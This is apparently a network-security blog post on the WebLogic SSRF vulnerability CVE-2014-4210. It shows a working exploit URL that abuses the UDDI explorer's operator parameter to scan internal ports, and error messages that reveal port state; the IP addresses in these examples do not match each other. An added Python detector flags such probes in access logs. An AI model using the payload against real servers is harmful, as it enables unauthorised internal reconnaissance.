蜗蜗侠's Blog - Focused on Network Security (Mobile Version)


WebLogic SSRF CVE-2014-4210: Scanning Internal-Network Host Information

Scanning internal-network host information:
exp: https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
 
When the exp is requested, if port 22 on 10.0.0.1 is open, the response is:
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.2:22 which did not have a valid SOAP content-type: null.   
 
When the exp is requested, if port 22 on 10.0.0.1 is closed, the response is:
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Socket Closed  
 
From the difference between these responses, we can scan the port status of hosts on the internal network.
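Seen from the defending side, this behaviour leaves a clear trace in the WebLogic front-end access log: repeated requests to SearchPublicRegistries.jsp whose operator parameter names internal addresses and changing ports. The following is an added example, not part of the original post. It assumes a common/combined-format access log; the function names are hypothetical and the sample log lines are constructed.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
# Request field of a common/combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST) (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real system.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&btnSubmit=Search HTTP/1.1" 200 1021
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F10.0.0.4%3A80&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 1019
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.5:3306&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 1019
203.0.113.9 - - [01/Jan/2024:10:05:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.com/inquire&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 2210
"""

def operator_target(uri):
    """Return (host, port) named by the operator parameter, else None."""
    parts = urlsplit(uri)
    if parts.path != UDDI_PATH:
        return None
    try:
        target = urlsplit(parse_qs(parts.query).get("operator", [""])[0])
        port = target.port or (443 if target.scheme == "https" else 80)
    except ValueError:  # malformed URL or port
        return None
    return (target.hostname, port) if target.hostname else None

def is_internal(host):
    """True for literal private, loopback or link-local IP addresses."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; resolving it is out of scope here
    return ip.is_private or ip.is_loopback or ip.is_link_local

def find_ssrf_probes(log_text, min_targets=2):
    """Map client -> sorted internal host:port targets, for clients with >= min_targets."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        target = operator_target(m.group("uri")) if m else None
        if target and is_internal(target[0]):
            seen[m.group("client")].add("%s:%d" % target)
    return {c: sorted(t) for c, t in seen.items() if len(t) >= min_targets}

if __name__ == "__main__":
    print(find_ssrf_probes(SAMPLE_LOG))
```

Hostnames in the operator value are not resolved here, so a name that points at an internal address is not flagged by this check.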
 
Weblogic ssrf   CVE-2014-4210 - sn0w - 雪花 -  root@sn0w.top
 
http://www.cnblogs.com/handt/p/5502975.html

(Editor: 蜗蜗侠)